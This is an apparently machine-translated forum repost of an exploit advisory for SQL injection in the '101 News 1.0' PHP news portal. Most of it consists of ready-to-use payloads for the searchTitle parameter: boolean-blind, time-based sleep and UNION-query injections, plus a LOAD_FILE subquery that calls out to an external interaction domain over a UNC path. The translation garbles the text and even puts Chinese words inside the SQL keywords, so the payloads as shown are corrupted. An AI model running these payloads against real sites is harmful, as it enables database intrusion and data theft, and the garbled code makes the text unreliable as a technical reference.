H

101新闻1.0-多链

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title: 101 news-1.0多sqli
##作者: nu11secur1ty
## date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/...portal-project-project-php-free-download.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
搜索title参数似乎很容易受到SQL注入的影响
攻击。有效载荷'+(选择
load_file('\\\\ sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif644.oastify.com \\ utu'))+'')+'
在搜索台参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互,表明注射的SQL查询
被执行。
[+]有效载荷:
``MySQL
---
参数: SearchTitle(post)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句
payload: searchTitle=-7320%'或3167=3167和'urva%'='urva
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: SEERCHTITLE=814271'+(选择
load_file('\\\\ sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupapaputka.com \\ utu'))+'%''
(从(select(sleep(15)))ymel选择8775)和'gpwh%'='gpwh
type:联合查询
title: mysql联合查询(null)-3列
PAYLOAD: SEERCHTITLE=814271'+(选择
load_file('\\\\ sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupapaputka.com \\ utu'))+'%''
联盟全部选择
Null,Null,Null,Null,Null,Null,Concat(0x71627A6A71,0x4B6D704E6546715A666662496571705 179434D6D5A71586B567A4278464C564D61766174626F787063,0X7170767071),null,Null#
##复制:
##证明和Exploit:
系统管理员- 基础设施工程师
穿透测试工程师
nu11secur1ty http://nu11secur1ty.com/
 
后退
顶部